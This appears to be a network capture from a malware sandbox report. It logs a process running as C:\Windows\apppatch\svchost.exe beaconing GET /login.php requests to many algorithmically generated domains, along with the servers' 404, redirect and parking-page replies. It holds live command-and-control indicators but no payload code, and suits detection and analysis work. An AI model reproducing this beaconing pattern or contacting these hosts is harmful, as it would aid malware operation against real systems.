                                                                                                                                                                                                          set-cookie: parking_session=3581daf9-42cf-4c3e-921a-5d98ff1008f3; expires=Mon, 11 Nov 2024 17:40:54 GMT; path=/
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:25:54.352089882 CET | 212 | IN
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzU4MWRhZjktNDJjZi00YzNlLTkyMWEtNWQ5OGZmMTAwOGYzIiwicGFnZV90aW1lIj
Nov 11, 2024 18:25:54.352099895 CET | 316 | IN
                                                                                                                                                                                                          Data Ascii: oxNzMxMzQ1OTU0LCJwYWdlX3VybCI6Imh0dHA6Ly92b2p5cWVtLmNvbS9sb2dpbi5waHAiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6eyJyZWZlcmVyIjpbImh0dHA6Ly93d3cuZ29vZ2xlLmNvbSJdfSwiaG9zdCI6InZvanlxZW0uY29tIiwiaXAiOiI2Ni4yMy4yMDYuM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 53522 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.927016973 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:25:54.378228903 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:48 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:25:54.378249884 CET | 169 | IN
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.8 | 53523 | 154.212.231.82 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.938534975 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:25:54.823400021 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:25:54.824806929 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Nov 11, 2024 18:25:55.202531099 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:55 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 53524 | 188.114.96.3 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.948034048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:25:55.335649014 CET | 972 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:55 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfKkKlHitQr0FpxYEtnkMEJnUp1Piv7X8oEoux17TDvI7OLunkoXQr2E1kg%2B5FF1LNlHgE%2Fcv71qX%2FM3Q%2FcOPVLe9XdvMX4QObCtYi9%2BGuqVLztxnQ38gnXqSE5cOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffbf67c2e8c24-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:25:56.592617989 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Nov 11, 2024 18:25:57.002827883 CET | 805 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:56 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38lT4Rdb1bZUWjyPU0N%2F261ILnWvVmjVqtcvCm7vfN3MmN4whuHWP%2F8aYSJF%2BNBT7OyCaNm5HSJkbCCy6dKUCdttMvU0SQhjWlBdaTEzcaR6PIROXWFE%2B9RsGo0uMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc04fd828c24-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2188964&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:25:57.002897978 CET | 173 | IN
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 53526 | 75.2.71.199 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.957417965 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
Nov 11, 2024 18:25:54.385104895 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 53527 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:54.335731030 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 53530 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:54.403803110 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:25:54.888887882 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:49 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:25:54.888935089 CET | 169 | IN
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 53544 | 188.114.96.3 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:58.343590975 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:25:59.018065929 CET | 976 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9rhgPS7%2BusTnynnRt%2BIeyAWvK8u%2FP09J%2B73HISsEqSe1VCAqqHnDU5I0IqvjrBrUwVuT6%2F9jvaQmR7T3uy7vhVEU1Z7S6s7%2BCNe1BikQgq34zKN57UEMIltFGO%2BhVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc11fe8c42a5-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 53545 | 3.94.10.34 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:58.357043028 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygynud.com
                                                                                                                                                                                                          Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:25:58.779911995 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345958|1731345850|54|2|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 53546 | 13.248.169.48 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:58.433348894 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupydeq.com
Nov 11, 2024 18:25:58.891608000 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 53547 | 18.208.156.248 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:58.569879055 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupycag.com
                                                                                                                                                                                                          Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:25:58.996804953 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345958|1731345850|54|2|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 53548 | 103.150.10.48 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:58.930738926 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:25:59.709417105 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:59 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.8 | 53550 | 106.15.232.163 | 8000 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:59.718523979 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:26:00.511174917 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:00 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 53551 | 103.150.10.48 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:00.520631075 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Nov 11, 2024 18:26:01.317761898 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.8 | 53552 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:00.953346014 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:26:01.737243891 CET | 974 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpOGnEarO1O4K%2BzZ7h%2BTWvbp2oNaJr1ggjnBqJQpVJ%2FQQhoz7ab%2BzhPw1%2Btccg3T4czKTnYV6O1nyDqEwF6FxuRRHnoUjbTC%2BBGTYkegvUVezIEtoXL1gIReMynWhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc224cba0fa0-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.8 | 53553 | 106.15.232.163 | 8000 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:01.324882984 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
Nov 11, 2024 18:26:02.100539923 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.2.8 | 53555 | 64.225.91.73 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:03.718280077 CET | 324 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
                                                                                                                                                                                                          If-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          If-None-Match: "63f68860-251"
